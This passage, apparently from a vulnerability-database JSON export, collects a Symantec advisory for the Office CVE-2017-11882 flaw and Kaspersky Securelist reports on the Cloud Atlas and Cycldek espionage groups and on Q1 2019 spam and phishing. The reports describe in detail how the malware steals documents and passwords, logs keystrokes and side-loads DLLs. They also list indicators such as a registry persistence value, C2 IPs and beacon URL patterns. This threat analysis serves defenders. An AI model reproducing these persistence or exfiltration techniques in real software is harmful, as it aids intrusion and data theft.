"Microsoft Office CVE-2018-0802 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T17:01:30", "bulletinFamily": "software", "cvelist": ["CVE-2017-11882"], "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 (32-bit edition) SP2 \n * Microsoft Office 2010 (64-bit edition) SP2 \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101757", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101757", "type": "symantec", "title": "Microsoft Office CVE-2017-11882 Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2019-08-12T19:33:22", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victims - hosted on remote servers. 
We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". 
The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. \n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for 
VBShower;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique per victim, so it can't be searched for via file hash on the host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy as the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. 
More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "modified": "2019-08-12T10:00:58", "published": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "type": "securelist", "title": "Recent Cloud Atlas activity", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. 
Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. 
Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. 
Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). 
If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. 
But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. 
The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). 
The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. 
**12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. 
against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "modified": "2019-05-15T10:00:23", "published": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "type": "securelist", "title": "Spam and phishing in Q1 2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T11:50:54", "bulletinFamily": "blog", "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. 
In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. 
The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**__Figure 1_: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. 
It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. 
Notable characteristics of each cluster's implant are summarized in the table below.\n\n| **BlueCore** | **RedCore** \n---|---|--- \nInitial Infection Vector | RTF documents | Unknown \nLegitimate AV Utility | QcConsol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) \nSide-Loaded DLL | QcLite.dll | wsc.dll \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm - contains PE loading shellcode and an encrypted RedCore binary \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or C:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6}, {F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB}, {E68DFA68-1132-4A32-ADE2-8C87F282C457}, {728264DE-3701-419B-84A4-2AD86B0C43A3}, {2BCD5B61-288C-44D5-BA0D-AAA00E9D2273}, {D9AE3AB0-D123-4F38-A9BE-898C8D49A214} \nCommunicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s or http://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s \n \n_**_Table 1_: Comparison of BlueCore and RedCore loader and implant traits.** _\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities, and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. 
By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**__Figure_ 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**__Figure 3_: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. 
When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL event. Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&C and inform it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect to and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. 
